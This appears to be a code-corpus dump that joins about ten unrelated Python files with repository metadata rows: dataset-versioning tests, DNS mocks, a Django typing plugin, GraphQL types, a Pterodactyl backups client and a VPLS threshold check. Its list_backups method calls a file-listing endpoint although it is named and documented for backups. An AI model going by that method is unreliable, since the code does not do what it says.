assert len(versions) == 2
dataset_version1 = client.get_dataset_version(id=version1.id)
assert dataset_version1.id == version1.id
version = dataset.get_latest_version(ascending=True)
assert version.id == version1.id
@pytest.mark.skip(reason="functionality removed")
def test_reincarnation(self, client, created_datasets):
"""Consecutive identical versions are assigned the same ID."""
dataset = client.set_dataset(type="local")
created_datasets.append(dataset)
version1 = dataset.create_version(path=__file__)
version2 = dataset.create_version(path=__file__)
assert version1.id == version2.id
versions = dataset.get_all_versions()
assert len(versions) == 1
version = dataset.get_latest_version(ascending=True)
assert version.id == version1.id
class TestPathBasedDatasetVersions:
@pytest.mark.skip(reason="direct instantiation of info-less DatasetVersion not supported by backend")
def test_creation_from_scratch(self, client, created_datasets):
dataset = Dataset(client._conn, client._conf,
dataset_type=_DatasetService.DatasetTypeEnum.PATH)
created_datasets.append(dataset)
version = DatasetVersion(client._conn, client._conf,
dataset_id=dataset.id,
dataset_version_info=_DatasetVersionService.PathDatasetVersionInfo(),
dataset_type=_DatasetService.DatasetTypeEnum.PATH)
assert version.id
@pytest.mark.skip(reason="direct instantiation of info-less DatasetVersion not supported by backend")
def test_creation_by_id(self, client, created_datasets):
dataset = Dataset(client._conn, client._conf,
dataset_type=_DatasetService.DatasetTypeEnum.PATH)
created_datasets.append(dataset)
version = DatasetVersion(client._conn, client._conf,
dataset_id=dataset.id,
dataset_version_info=_DatasetVersionService.PathDatasetVersionInfo(),
dataset_type=_DatasetService.DatasetTypeEnum.PATH)
assert version.id
same_version = DatasetVersion(client._conn, client._conf,
_dataset_version_id=version.id)
assert version.id == same_version.id
class TestQueryDatasets:
def test_creation_from_scratch(self, client, created_datasets):
dataset = Dataset(client._conn, client._conf,
dataset_type=_DatasetService.DatasetTypeEnum.DatasetType.QUERY)
created_datasets.append(dataset)
assert dataset.id
def test_creation_by_id(self, client, created_datasets):
dataset = Dataset(client._conn, client._conf,
dataset_type=_DatasetService.DatasetTypeEnum.DatasetType.QUERY)
created_datasets.append(dataset)
assert dataset.id
same_dataset = Dataset(client._conn, client._conf,
_dataset_id=dataset.id)
assert dataset.id == same_dataset.id
class TestQueryDatasetVersions:
@pytest.mark.skip(reason="direct instantiation of info-less DatasetVersion not supported by backend")
def test_creation_from_scratch(self, client, created_datasets):
dataset = Dataset(client._conn, client._conf,
dataset_type=_DatasetService.DatasetTypeEnum.DatasetType.QUERY)
created_datasets.append(dataset)
version = DatasetVersion(client._conn, client._conf,
dataset_id=dataset.id,
dataset_version_info=_DatasetVersionService.QueryDatasetVersionInfo(),
dataset_type=_DatasetService.DatasetTypeEnum.QUERY)
assert version.id
@pytest.mark.skip(reason="direct instantiation of info-less DatasetVersion not supported by backend")
def test_creation_by_id(self, client, created_datasets):
dataset = Dataset(client._conn, client._conf,
dataset_type=_DatasetService.DatasetTypeEnum.QUERY)
created_datasets.append(dataset)
version = DatasetVersion(client._conn, client._conf,
dataset_id=dataset.id,
dataset_version_info=_DatasetVersionService.QueryDatasetVersionInfo(),
dataset_type=_DatasetService.DatasetTypeEnum.QUERY)
assert version.id
same_version = DatasetVersion(client._conn, client._conf,
_dataset_version_id=version.id)
assert version.id == same_version.id
class TestFileSystemDatasetVersionInfo:
def test_single_file(self):
dir_name, file_names = self.create_dir_with_files(num_files=1)
fsdvi = FilesystemDatasetVersionInfo(dir_name + "/" + file_names[0])
assert len(fsdvi.dataset_part_infos) == 1
assert fsdvi.size == 7
shutil.rmtree(dir_name)
def test_dir(self):
dir_name, _ = self.create_dir_with_files(num_files=10)
fsdvi = FilesystemDatasetVersionInfo(dir_name)
assert len(fsdvi.dataset_part_infos) == 10
assert fsdvi.size == 70
shutil.rmtree(dir_name)
def create_dir_with_files(self, num_files=10):
dir_name = 'FSD:' + str(time.time())
file_names = []
os.mkdir(dir_name)
for num_file in range(num_files):
file_name = str(num_file) + ".txt"
f = open(dir_name + "/" + file_name, 'w')
f.write('123456\n')
file_names.append(file_name)
return dir_name, file_names
class TestS3DatasetVersionInfo:
def test_single_object(self, s3_bucket, s3_object):
botocore = pytest.importorskip("botocore")
try:
s3dvi = S3DatasetVersionInfo(s3_bucket, s3_object)
assert len(s3dvi.dataset_part_infos) == 1
assert s3dvi.size > 0
except botocore.exceptions.ClientError:
pytest.skip("insufficient AWS credentials")
def test_bucket(self, s3_bucket):
botocore = pytest.importorskip("botocore")
try:
s3dvi = S3DatasetVersionInfo(s3_bucket)
assert len(s3dvi.dataset_part_infos) >= 1
assert s3dvi.size > 0
except botocore.exceptions.ClientError:
pytest.skip("insufficient AWS credentials")
class TestS3ClientFunctions:
def test_s3_dataset_creation(self, client, created_datasets):
botocore = pytest.importorskip("botocore")
try:
dataset = client.set_dataset(type="s3")
created_datasets.append(dataset)
except botocore.exceptions.ClientError:
pytest.skip("insufficient AWS credentials")
def test_s3_dataset_version_creation(self, client, s3_bucket, created_datasets):
botocore = pytest.importorskip("botocore")
try:
dataset = client.set_dataset(type="s3")
created_datasets.append(dataset)
dataset_version = dataset.create_version(s3_bucket)
assert len(dataset_version.dataset_version_info.dataset_part_infos) >= 1
except botocore.exceptions.ClientError:
pytest.skip("insufficient AWS credentials")
class TestFilesystemClientFunctions:
def test_filesystem_dataset_creation(self, client, created_datasets):
dataset = client.set_dataset(type="local")
created_datasets.append(dataset)
def test_filesystem_dataset_version_creation(self, client, created_datasets):
dir_name, _ = self.create_dir_with_files(num_files=3)
dataset = client.set_dataset(type="local")
created_datasets.append(dataset)
dataset_version = dataset.create_version(dir_name)
assert len(dataset_version.dataset_version_info.dataset_part_infos) == 3
shutil.rmtree(dir_name)
def create_dir_with_files(self, num_files=10):
dir_name = 'FSD:' + str(time.time())
file_names = []
os.mkdir(dir_name)
for num_file in range(num_files):
file_name = str(num_file) + ".txt"
f = open(dir_name + "/" + file_name, 'w')
f.write('123456\n')
file_names.append(file_name)
return dir_name, file_names
@pytest.mark.skip("dropped support for query datasets, for the time being")
class TestBigQueryDatasetVersionInfo:
def test_big_query_dataset(self, client, created_datasets):
dataset = client.set_dataset(type="big query")
created_datasets.append(dataset)
def test_big_query_dataset_version_creation(self, client, bq_query, bq_location, created_datasets):
google = pytest.importorskip("google")
bigquery = pytest.importorskip("google.cloud.bigquery")
try:
query_job = google.cloud.bigquery.Client().query(
bq_query,
# Location must match that of the dataset(s) referenced in the query.
location=bq_location,
)
dataset = client.set_dataset(type="big query")
created_datasets.append(dataset)
dataset_version = dataset.create_version(job_id=query_job.job_id, location=bq_location)
assert dataset_version.dataset_version_info.query == bq_query
except google.auth.exceptions.GoogleAuthError:
pytest.skip("insufficient GCP credentials")
@pytest.mark.skip("dropped support for query datasets, for the time being")
class TestRDBMSDatasetVersionInfo:
def test_rdbms_dataset(self, client, created_datasets):
dataset = client.set_dataset(type="postgres")
created_datasets.append(dataset)
def test_rdbms_version_creation(self, client, created_datasets):
dataset = client.set_dataset(type="postgres")
created_datasets.append(dataset)
dataset_version = dataset.create_version(query="SELECT * FROM ner-table",
db_connection_str="localhost:6543",
num_records=100)
assert dataset_version.dataset_version_info.query == "SELECT * FROM ner-table"
assert dataset_version.dataset_version_info.data_source_uri == "localhost:6543"
assert dataset_version.dataset_version_info.num_records == 100
@pytest.mark.skip("Backend needs to be fixed to preserve `base_path`")
class TestLogDatasetVersion:
def test_log_dataset_version(self, client, created_datasets, experiment_run):
dataset = client.set_dataset(type="local")
created_datasets.append(dataset)
dataset_version = dataset.create_version(__file__)
experiment_run.log_dataset_version('train', dataset_version)
retrieved_dataset_version = experiment_run.get_dataset_version('train')
path = retrieved_dataset_version.dataset_version.path_dataset_version_info.base_path
assert path.endswith(__file__)
def test_overwrite(self, client, created_datasets, experiment_run, s3_bucket):
dataset = client.set_dataset(type="local")
created_datasets.append(dataset)
dataset_version = dataset.create_version(__file__)
experiment_run.log_dataset_version('train', dataset_version)
new_dataset_version = dataset.create_version("conftest.py")
experiment_run.log_dataset_version('train', new_dataset_version, overwrite=True)
retrieved_dataset_version = experiment_run.get_dataset_version('train')
path = retrieved_dataset_version.dataset_version.path_dataset_version_info.base_path
assert path.endswith("conftest.py")
| 40.409434 | 118 | 0.67241 | 2,359 | 21,417 | 5.828317 | 0.112336 | 0.074187 | 0.054986 | 0.054549 | 0.763037 | 0.72478 | 0.674158 | 0.652484 | 0.645938 | 0.618009 | 0 | 0.009578 | 0.239483 | 21,417 | 529 | 119 | 40.485822 | 0.834541 | 0.030536 | 0 | 0.602041 | 0 | 0.002551 | 0.073333 | 0.00593 | 0 | 0 | 0 | 0.00189 | 0.173469 | 1 | 0.107143 | false | 0.005102 | 0.045918 | 0.010204 | 0.211735 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fbbecee3794fdefec8c8a2d4708d4a461d5114d3 | 1,629 | py | Python | sewer/dns_providers/tests/test_utils.py | m4ldonado/sewer | 4d4930cf4dd8b6efb8e23629fea37a2a2580151f | [
"MIT"
] | null | null | null | sewer/dns_providers/tests/test_utils.py | m4ldonado/sewer | 4d4930cf4dd8b6efb8e23629fea37a2a2580151f | [
"MIT"
] | null | null | null | sewer/dns_providers/tests/test_utils.py | m4ldonado/sewer | 4d4930cf4dd8b6efb8e23629fea37a2a2580151f | [
"MIT"
] | null | null | null | import json
class MockResponse(object):
"""
mock python-requests Response object
"""
def __init__(self, status_code=200, content=None):
if not content:
content = {}
content.update({
'something': 'ok',
'result': [{'name': 'example.com', 'id': 'some-mock-dns-zone-id'}]
})
self.content = json.dumps(content).encode()
self.status_code = status_code
self.headers = {}
def json(self):
return json.loads(self.content.decode())
class mockLibcloudDriverZone(object):
"""
A mock of a dns zone in a libcloud drivers dns
"""
id = 'mock-zone-id-1'
def create_record(self, name, type, data):
pass
class mockLibcloudDriver(object):
"""
a mock of libcloud.dns.drivers.auroradns.AuroraDNSDriver class
"""
def __init__(self, key, secret):
pass
def get_zone(self, domainSuffix):
mock_zone = mockLibcloudDriverZone()
return mock_zone
def list_records(self, zone):
import collections
DnsRecords = collections.namedtuple('DnsRecords', 'id name type')
one_dns_record = DnsRecords(id='1', name='_acme-challenge', type='TXT')
records = [one_dns_record]
return records
def get_record(self, zone_id, record_id):
return 'mock-record'
def delete_record(self, record):
pass
def mockLibcloudGetDriver(provider):
"""
a mock of the libcloud.dns.providers.get_driver function
"""
return mockLibcloudDriver
class MockDnsResolver(object):
canonical_name = 'canonical.name'
| 23.271429 | 79 | 0.623082 | 184 | 1,629 | 5.369565 | 0.396739 | 0.030364 | 0.021255 | 0.026316 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00416 | 0.262124 | 1,629 | 69 | 80 | 23.608696 | 0.817804 | 0.124616 | 0 | 0.078947 | 0 | 0 | 0.098901 | 0.015385 | 0 | 0 | 0 | 0 | 0 | 1 | 0.236842 | false | 0.078947 | 0.052632 | 0.052632 | 0.578947 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
837d9f5cce2df95dc2fc8e658931ae03ce48abda | 129 | py | Python | settings/laser_safety_shutter_settings.py | bopopescu/Lauecollect | 60ae2b05ea8596ba0decf426e37aeaca0bc8b6be | [
"MIT"
] | null | null | null | settings/laser_safety_shutter_settings.py | bopopescu/Lauecollect | 60ae2b05ea8596ba0decf426e37aeaca0bc8b6be | [
"MIT"
] | 1 | 2019-10-22T21:28:31.000Z | 2019-10-22T21:39:12.000Z | settings/laser_safety_shutter_settings.py | bopopescu/Lauecollect | 60ae2b05ea8596ba0decf426e37aeaca0bc8b6be | [
"MIT"
] | 2 | 2019-06-06T15:06:46.000Z | 2020-07-20T02:03:22.000Z | description = 'Laser Safety Shutter'
prefix = '14IDB:B1Bi0'
target = 0.0
command_value = 1.0
auto_open = 0.0
EPICS_enabled = True | 21.5 | 36 | 0.744186 | 21 | 129 | 4.428571 | 0.809524 | 0.043011 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 0.147287 | 129 | 6 | 37 | 21.5 | 0.754545 | 0 | 0 | 0 | 0 | 0 | 0.238462 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
83899ce2972b38534d54b11e79940124827f4e44 | 1,655 | py | Python | mypy_django_plugin/transformers/request.py | ticosax/django-stubs | 2f7fac2eaf87fe1e50d635ab14bcbe6c475dabc8 | [
"MIT"
] | 1 | 2021-02-08T12:20:15.000Z | 2021-02-08T12:20:15.000Z | mypy_django_plugin/transformers/request.py | ticosax/django-stubs | 2f7fac2eaf87fe1e50d635ab14bcbe6c475dabc8 | [
"MIT"
] | 7 | 2021-03-05T23:08:02.000Z | 2022-03-12T00:47:19.000Z | mypy_django_plugin/transformers/request.py | ticosax/django-stubs | 2f7fac2eaf87fe1e50d635ab14bcbe6c475dabc8 | [
"MIT"
] | null | null | null | from mypy.plugin import AttributeContext
from mypy.types import Instance
from mypy.types import Type as MypyType
from mypy.types import UnionType
from mypy_django_plugin.django.context import DjangoContext
from mypy_django_plugin.lib import helpers
def set_auth_user_model_as_type_for_request_user(ctx: AttributeContext, django_context: DjangoContext) -> MypyType:
# Imported here because django isn't properly loaded yet when module is loaded
from django.contrib.auth.base_user import AbstractBaseUser
from django.contrib.auth.models import AnonymousUser
abstract_base_user_info = helpers.lookup_class_typeinfo(helpers.get_typechecker_api(ctx), AbstractBaseUser)
anonymous_user_info = helpers.lookup_class_typeinfo(helpers.get_typechecker_api(ctx), AnonymousUser)
# This shouldn't be able to happen, as we managed to import the models above.
assert abstract_base_user_info is not None
assert anonymous_user_info is not None
if ctx.default_attr_type != UnionType([Instance(abstract_base_user_info, []), Instance(anonymous_user_info, [])]):
# Type has been changed from the default in django-stubs.
# I.e. HttpRequest has been subclassed and user-type overridden, so let's leave it as is.
return ctx.default_attr_type
auth_user_model = django_context.settings.AUTH_USER_MODEL
user_cls = django_context.apps_registry.get_model(auth_user_model)
user_info = helpers.lookup_class_typeinfo(helpers.get_typechecker_api(ctx), user_cls)
if user_info is None:
return ctx.default_attr_type
return UnionType([Instance(user_info, []), Instance(anonymous_user_info, [])])
| 47.285714 | 118 | 0.791541 | 237 | 1,655 | 5.257384 | 0.362869 | 0.064205 | 0.041734 | 0.045746 | 0.26565 | 0.199839 | 0.14687 | 0.14687 | 0.14687 | 0.14687 | 0 | 0 | 0.144411 | 1,655 | 34 | 119 | 48.676471 | 0.879944 | 0.178852 | 0 | 0.095238 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.095238 | 1 | 0.047619 | false | 0 | 0.380952 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
838ade99e696aaa513363ba78d50cc0dcf4dcd8c | 1,829 | py | Python | backend/handlers/graphql/types/vdi.py | al-indigo/vmemperor | 80eb6d47d839a4736eb6f9d2fcfad35f0a7b3bb1 | [
"Apache-2.0"
] | null | null | null | backend/handlers/graphql/types/vdi.py | al-indigo/vmemperor | 80eb6d47d839a4736eb6f9d2fcfad35f0a7b3bb1 | [
"Apache-2.0"
] | 8 | 2017-10-11T13:26:10.000Z | 2021-12-13T20:27:52.000Z | backend/handlers/graphql/types/vdi.py | ispras/vmemperor | 80eb6d47d839a4736eb6f9d2fcfad35f0a7b3bb1 | [
"Apache-2.0"
] | 4 | 2017-07-27T12:25:42.000Z | 2018-01-28T02:06:26.000Z | from enum import auto
import graphene
from serflag import SerFlag
from handlers.graphql.interfaces.aclxenobject import GAclXenObject
from handlers.graphql.interfaces.quotaobject import GQuotaObject
from handlers.graphql.resolvers.accessentry import resolve_accessentries
from handlers.graphql.resolvers.myactions import resolve_myactions, resolve_owner
from handlers.graphql.resolvers.sr import srType, srContentType
from handlers.graphql.types.access import create_access_type
from handlers.graphql.types.base.gxenobjecttype import GXenObjectType
from handlers.graphql.types.vbd import GVBD
from handlers.graphql.utils.query import resolve_one, resolve_many
class VDIActions(SerFlag):
rename = auto()
plug = auto()
destroy = auto()
class VDIType(graphene.Enum):
'''
VDI class supports only a subset of VDI types, that are listed below.
'''
System = "system"
User = "user"
Ephemeral = "ephemeral"
GVDIActions = graphene.Enum.from_enum(VDIActions)
GVDIAccessEntry = create_access_type("GVDIAccessEntry", GVDIActions)
class GVDI(GXenObjectType):
class Meta:
interfaces = (GAclXenObject, GQuotaObject)
access = graphene.Field(graphene.List(GVDIAccessEntry), required=True,
resolver=resolve_accessentries(VDIActions))
my_actions = graphene.Field(graphene.List(GVDIActions), required=True, resolver=resolve_myactions(VDIActions))
is_owner = graphene.Field(graphene.Boolean, required=True, resolver=resolve_owner(VDIActions))
SR = graphene.Field(srType, resolver=resolve_one()) #
virtual_size = graphene.Field(graphene.Float, required=True) #
VBDs = graphene.List(GVBD, required=True, resolver=resolve_many())
content_type = graphene.Field(srContentType, required=True)
type = graphene.Field(VDIType, required=True) | 37.326531 | 114 | 0.772007 | 210 | 1,829 | 6.633333 | 0.338095 | 0.077531 | 0.122757 | 0.077531 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.141061 | 1,829 | 49 | 115 | 37.326531 | 0.886696 | 0.037726 | 0 | 0 | 0 | 0 | 0.019507 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.352941 | 0 | 0.882353 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
83900cfe8e2b666f2ad700e67d2fa38ff64bd216 | 526 | py | Python | Dalitz_simplified/optimisation/classifier_eval_wrapper.py | weissercn/MLTools | 75dc566947437249ad077939941839126eb20016 | [
"MIT"
] | null | null | null | Dalitz_simplified/optimisation/classifier_eval_wrapper.py | weissercn/MLTools | 75dc566947437249ad077939941839126eb20016 | [
"MIT"
] | null | null | null | Dalitz_simplified/optimisation/classifier_eval_wrapper.py | weissercn/MLTools | 75dc566947437249ad077939941839126eb20016 | [
"MIT"
] | null | null | null | import numpy as np
import math
import sys
sys.path.insert(0,'../')
import classifier_eval_simplified
# Write a function like this called 'main'
def main(job_id, params):
print 'Anything printed here will end up in the output directory for job #%d' % job_id
print params
result= classifier_eval_simplified.classifier_eval(params['aC'], params['agamma'],2)
with open("optimisation_values.txt", "a") as myfile:
myfile.write(str(params['aC'])+"\n"+ str(params['agamma'])+"\n"+str(result))
return result
| 35.066667 | 90 | 0.712928 | 79 | 526 | 4.64557 | 0.620253 | 0.114441 | 0.13079 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004474 | 0.15019 | 526 | 14 | 91 | 37.571429 | 0.816555 | 0.076046 | 0 | 0 | 0 | 0 | 0.239669 | 0.047521 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.333333 | null | null | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
83a1d6cc8f86ff593b3fdcd39417fd16589ca6c8 | 2,330 | py | Python | pydactyl/api/client/servers/backups.py | jozefbonnar/pydactyl | b45ce82ac0e20c786ffd3a65bab959c9bb3226ba | [
"MIT"
] | null | null | null | pydactyl/api/client/servers/backups.py | jozefbonnar/pydactyl | b45ce82ac0e20c786ffd3a65bab959c9bb3226ba | [
"MIT"
] | null | null | null | pydactyl/api/client/servers/backups.py | jozefbonnar/pydactyl | b45ce82ac0e20c786ffd3a65bab959c9bb3226ba | [
"MIT"
] | null | null | null | from pydactyl.api import base
class Backups(base.PterodactylAPI):
"""Pterodactyl Client Server Backups API."""
def list_backups(self, server_id: str):
"""List files belonging to specified server.
Optionally specify a directory and only return results in the
specified directory. Directory is relative to the server's root.
Args:
server_id(str): Server identifier (abbreviated UUID)
"""
endpoint = 'client/servers/{}/files/list'.format(server_id)
response = self._api_request(endpoint=endpoint)
return response
def create_backup(self, server_id: str):
"""Create a new backup of the specified server.
Args:
server_id(str): Server identifier (abbreviated UUID)
"""
endpoint = 'client/servers/{}/backups'.format(server_id)
response = self._api_request(endpoint=endpoint, mode='POST')
return response
def get_backup_detail(self, server_id: str, backup_id: str):
"""Retrieves information about the specified backup.
Args:
server_id(str): Server identifier (abbreviated UUID)
backup_id(str): Backup identifier (long UUID)
"""
endpoint = 'client/servers/{}/backups/{}'.format(server_id, backup_id)
response = self._api_request(endpoint=endpoint)
return response
def get_backup_download(self, server_id: str, backup_id: str):
"""Generates a download link for the specified backup.
Args:
server_id(str): Server identifier (abbreviated UUID)
backup_id(str): Backup identifier (long UUID)
"""
endpoint = 'client/servers/{}/backups/{}/download'.format(server_id,
backup_id)
response = self._api_request(endpoint=endpoint)
return response
def delete_backup(self, server_id: str, backup_id: str):
"""Deletes the specified backup.
Args:
server_id(str): Server identifier (abbreviated UUID)
backup_id(str): Backup identifier (long UUID)
"""
endpoint = 'client/servers/{}/backups/{}'.format(server_id, backup_id)
response = self._api_request(endpoint=endpoint, mode='DELETE')
return response
| 36.984127 | 78 | 0.627897 | 260 | 2,330 | 5.469231 | 0.234615 | 0.056259 | 0.077356 | 0.052743 | 0.706751 | 0.66315 | 0.66315 | 0.608298 | 0.59775 | 0.552743 | 0 | 0 | 0.274249 | 2,330 | 62 | 79 | 37.580645 | 0.840923 | 0.367382 | 0 | 0.434783 | 0 | 0 | 0.122066 | 0.114241 | 0 | 0 | 0 | 0 | 0 | 1 | 0.217391 | false | 0 | 0.043478 | 0 | 0.521739 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
83b78a7f448df8273c67d7f82dd180e4fe6e5c26 | 378 | py | Python | tests/interface/wsgi_test.py | Jaymon/endpoints | f3864d4a8e915686fdefac34142a40245fdf2f35 | [
"MIT"
] | 18 | 2018-09-28T23:13:09.000Z | 2021-06-23T20:15:58.000Z | tests/interface/wsgi_test.py | firstopinion/endpoints | f3864d4a8e915686fdefac34142a40245fdf2f35 | [
"MIT"
] | 60 | 2015-01-22T01:10:28.000Z | 2018-02-20T23:54:50.000Z | tests/interface/wsgi_test.py | Jaymon/endpoints | f3864d4a8e915686fdefac34142a40245fdf2f35 | [
"MIT"
] | 8 | 2018-04-22T03:54:56.000Z | 2021-12-02T09:53:42.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals, division, print_function, absolute_import
from endpoints.interface.wsgi.client import WebServer
from . import WebTestCase, WebServerTestCase
class WebTest(WebTestCase):
server_class = WebServer
class WebServerTest(WebServerTestCase):
server_class = WebServer
del WebTestCase
del WebServerTestCase
| 19.894737 | 82 | 0.798942 | 40 | 378 | 7.325 | 0.6 | 0.075085 | 0.136519 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003058 | 0.134921 | 378 | 18 | 83 | 21 | 0.892966 | 0.055556 | 0 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.777778 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
83beddcf144789476e4b1319fc268892c73c00f8 | 1,684 | py | Python | JDI/web/selenium/elements/base/base_element.py | jdi-testing/jdi-python | 7c0607b97d4d44b27ea8f532d47c68b8dd00e6f7 | [
"MIT"
] | 5 | 2020-02-14T10:32:01.000Z | 2021-07-22T08:20:28.000Z | JDI/web/selenium/elements/base/base_element.py | jdi-testing/jdi-python | 7c0607b97d4d44b27ea8f532d47c68b8dd00e6f7 | [
"MIT"
] | 54 | 2018-07-27T14:07:33.000Z | 2021-11-08T09:24:16.000Z | JDI/web/selenium/elements/base/base_element.py | jdi-testing/jdi-python | 7c0607b97d4d44b27ea8f532d47c68b8dd00e6f7 | [
"MIT"
] | 1 | 2021-01-20T14:31:52.000Z | 2021-01-20T14:31:52.000Z | from JDI.web.selenium.elements.api_interact.get_element_module import \
GetElementModule
class BaseElement:
name = None
parent = None
avatar = None
def __init__(self, by_locator=None):
self.avatar = GetElementModule(by_locator, self)
def get_driver(self):
return self.avatar.get_driver()
def __str__(self):
return self.__class__.__name__
def _get_type_name(self):
return self.__class__.__name__
def get_name(self):
return self.name if self.name is not None else self._get_type_name()
def get_parent(self):
return self.parent
def init(self, parent, avatar):
from JDI.web.selenium.elements.cascade_init import WebCascadeInit
WebCascadeInit.init_elements(self)
self.set_avatar(avatar)
self.set_parent(parent)
return self
def set_avatar(self, avatar):
self.avatar = avatar
return self
def set_parent(self, parent):
self.parent = parent
def get_locator(self):
return self.avatar.by_locator
def __str__(self):
s = "Name " + self.__class__.__name__
if "by_locator" in dir(self.avatar):
if self.avatar.by_locator is not None:
s += "; Locator: %s:'%s'" % (self.avatar.by_locator[0], self.avatar.by_locator[1])
if self.parent is not None:
if "avatar" in dir(self.parent):
if self.parent.avatar.by_locator is not None:
s += "; Parent: %s:'%s'" % (self.parent.avatar.by_locator[0], self.parent.avatar.by_locator[1])
return s
def has_locator(self):
return self.avatar.has_locator()
| 28.542373 | 115 | 0.633017 | 222 | 1,684 | 4.495496 | 0.18018 | 0.09018 | 0.098196 | 0.076152 | 0.295591 | 0.108216 | 0.108216 | 0 | 0 | 0 | 0 | 0.003239 | 0.266627 | 1,684 | 58 | 116 | 29.034483 | 0.804858 | 0 | 0 | 0.139535 | 0 | 0 | 0.033254 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.27907 | false | 0 | 0.046512 | 0.162791 | 0.651163 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
83c0792070097bda91e3f26101d57ecf9b27b2ce | 695 | py | Python | community_supplied/Kernel/Vpls/compare-vpls-flood-token-cnt.py | brahmastra2016/healthbot-rules | 1d24acd298266c39d6adb139ff47d14f8b2d452a | [
"Apache-2.0",
"BSD-3-Clause"
] | 43 | 2018-11-27T00:42:45.000Z | 2022-02-24T01:19:39.000Z | community_supplied/Kernel/Vpls/compare-vpls-flood-token-cnt.py | brahmastra2016/healthbot-rules | 1d24acd298266c39d6adb139ff47d14f8b2d452a | [
"Apache-2.0",
"BSD-3-Clause"
] | 266 | 2018-10-26T10:19:04.000Z | 2022-03-16T04:38:29.000Z | community_supplied/Kernel/Vpls/compare-vpls-flood-token-cnt.py | brahmastra2016/healthbot-rules | 1d24acd298266c39d6adb139ff47d14f8b2d452a | [
"Apache-2.0",
"BSD-3-Clause"
] | 99 | 2018-10-25T09:53:55.000Z | 2021-12-07T09:51:59.000Z | from jnpr.junos import Device
from jnpr.junos.utils.config import Config
"""
This function compares the current vpls flood token count in the system with the low threshold and high threshold and returns the result
"""
def compare_vpls_flood_token_cnt(vpls_flood_token_cnt, vpls_flood_token_max, **kwargs):
val = 0
low_thresh = float(0.8)*vpls_flood_token_max
high_thresh = float(0.9)*vpls_flood_token_max
if vpls_flood_token_cnt < low_thresh:
val = 0
elif vpls_flood_token_cnt >= low_thresh and vpls_flood_token_cnt <= high_thresh:
val = 1
elif vpls_flood_token_cnt > high_thresh:
val = 2
return val
